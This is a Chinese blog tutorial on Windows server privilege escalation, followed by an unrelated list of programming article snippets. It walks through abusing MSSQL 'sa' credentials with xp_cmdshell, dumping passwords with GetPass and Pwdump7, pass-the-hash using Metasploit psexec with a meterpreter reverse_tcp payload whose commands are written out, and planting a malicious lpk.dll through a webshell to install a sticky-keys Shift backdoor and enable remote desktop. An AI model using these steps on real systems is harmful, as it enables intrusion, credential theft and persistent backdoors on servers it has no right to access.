提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权

2024-06-17 05:58

本文主要是介绍提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

(一)、Mssql提权


必要条件:获取到mssql数据库最高权限用户sa的账号密码


Mssql默认端口:1433

Mssql最高权限用户:sa




得到sa密码之后,通过工具直接连接上去。




MSSQL自带了一个XP_CMDSHELL用来执行CMD命令。


(二)、GetPass 提权


一款获取计算机用户账号密码的工具




(三)、hash传递入侵 msf加载


Hash 算法:windows密码的加密方式

Msf下载:http://www.rapid7.com/products/metasploit/download.jsp


以下使用Kali演示


Msf使用:


msfconsole   //启动终端




use exploit/windows/smb/psexec //用到模块

show options //查看模块选项属性




set PAYLOAD windows/meterpreter/reverse_tcp   //设置漏洞利用载体

Show targets //查看模块的攻击目标属性




set LHOST //设置本机地址
set RHOST 192.168.0.254 //设置属性目标主机地址

set SMBUser administrators //设置属性用户




set SMBPass  xxx  //设置属性密文hash


目标主机的hash怎么获取了?可以通过Pwdump7这个工具来获取hash值




复制以下一段就行了






exploit  //开始攻击



获取当前shell,执行命令






(四)、lpk提权


触发:目录下存在exe文件被执行,他的特点是每个可执行文件运行之前都要加载该文件,windows系统是先判断当前文件目录是否存在此文件,如果目录下存在该文件则执行,如果不存在则会执行system32目录下的dll。


启动方案:3389远程桌面连接启动(连续shift,然后按热键)


提权方案:生成lpk.dll,通过webshell上传至文件目录,等待管理员去触发exe程序。


运行LPK Setch这个工具选择,2键启动,此时的2键3键值为LPK Sethc内置固定的数字,比如65,66就对应a与b。




然后点击生成,将生成的lpk.dll上传至任意目录,并运行其中的任何一个exe文件,lpk.dll将会自动替换为shift后门。

我这里把它生成到了软件的目录,然后点击运行软件




然后远程连接,连续按五次shift键,会出现下面的提示




接着同时按下组合键(也就是在哪里设置的65,66,对应的A,B),就会出现下面的密码框




输入密码,就会进入下面的界面!!!




还可以用来执行软件,比如用来开3389,在生成lpk.dll是选中




生成lpk.dll然后放到任意目录下,未执行软件之前远程是关闭的




然后执行exe软件,你好发现远程被打开了。







这篇关于提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1068640

相关文章

Spring Security 从入门到进阶系列教程

Spring Security 入门系列 《保护 Web 应用的安全》 《Spring-Security-入门(一):登录与退出》 《Spring-Security-入门(二):基于数据库验证》 《Spring-Security-入门(三):密码加密》 《Spring-Security-入门(四):自定义-Filter》 《Spring-Security-入门(五):在 Sprin

服务器集群同步时间手记

1.时间服务器配置(必须root用户) (1)检查ntp是否安装 [root@node1 桌面]# rpm -qa|grep ntpntp-4.2.6p5-10.el6.centos.x86_64fontpackages-filesystem-1.41-1.1.el6.noarchntpdate-4.2.6p5-10.el6.centos.x86_64 (2)修改ntp配置文件 [r

学习hash总结

2014/1/29/   最近刚开始学hash,名字很陌生,但是hash的思想却很熟悉,以前早就做过此类的题,但是不知道这就是hash思想而已,说白了hash就是一个映射,往往灵活利用数组的下标来实现算法,hash的作用:1、判重;2、统计次数;

hdu1043(八数码问题,广搜 + hash(实现状态压缩) )

利用康拓展开将一个排列映射成一个自然数,然后就变成了普通的广搜题。 #include<iostream>#include<algorithm>#include<string>#include<stack>#include<queue>#include<map>#include<stdio.h>#include<stdlib.h>#include<ctype.h>#inclu

康拓展开(hash算法中会用到)

康拓展开是一个全排列到一个自然数的双射(也就是某个全排列与某个自然数一一对应) 公式: X=a[n]*(n-1)!+a[n-1]*(n-2)!+...+a[i]*(i-1)!+...+a[1]*0! 其中,a[i]为整数,并且0<=a[i]<i,1<=i<=n。(a[i]在不同应用中的含义不同); 典型应用: 计算当前排列在所有由小到大全排列中的顺序,也就是说求当前排列是第

hdu1496(用hash思想统计数目)

作为一个刚学hash的孩子,感觉这道题目很不错,灵活的运用的数组的下标。 解题步骤:如果用常规方法解,那么时间复杂度为O(n^4),肯定会超时,然后参考了网上的解题方法,将等式分成两个部分,a*x1^2+b*x2^2和c*x3^2+d*x4^2, 各自作为数组的下标,如果两部分相加为0,则满足等式; 代码如下: #include<iostream>#include<algorithm

usaco 1.2 Milking Cows(类hash表)

第一种思路被卡了时间 到第二种思路的时候就觉得第一种思路太坑爹了 代码又长又臭还超时!! 第一种思路:我不知道为什么最后一组数据会被卡 超时超了0.2s左右 大概想法是 快排加一个遍历 先将开始时间按升序排好 然后开始遍历比较 1 若 下一个开始beg[i] 小于 tem_end 则说明本组数据与上组数据是在连续的一个区间 取max( ed[i],tem_end ) 2 反之 这个

科研绘图系列:R语言扩展物种堆积图(Extended Stacked Barplot)

介绍 R语言的扩展物种堆积图是一种数据可视化工具,它不仅展示了物种的堆积结果,还整合了不同样本分组之间的差异性分析结果。这种图形表示方法能够直观地比较不同物种在各个分组中的显著性差异,为研究者提供了一种有效的数据解读方式。 加载R包 knitr::opts_chunk$set(warning = F, message = F)library(tidyverse)library(phyl

【生成模型系列(初级)】嵌入(Embedding)方程——自然语言处理的数学灵魂【通俗理解】

【通俗理解】嵌入(Embedding)方程——自然语言处理的数学灵魂 关键词提炼 #嵌入方程 #自然语言处理 #词向量 #机器学习 #神经网络 #向量空间模型 #Siri #Google翻译 #AlexNet 第一节:嵌入方程的类比与核心概念【尽可能通俗】 嵌入方程可以被看作是自然语言处理中的“翻译机”,它将文本中的单词或短语转换成计算机能够理解的数学形式,即向量。 正如翻译机将一种语言

uva 10029 HASH + DP

题意: 给一个字典,里面有好多单词。单词可以由增加、删除、变换,变成另一个单词,问能变换的最长单词长度。 解析: HASH+dp 代码: #include <iostream>#include <cstdio>#include <cstdlib>#include <algorithm>#include <cstring>#include <cmath>#inc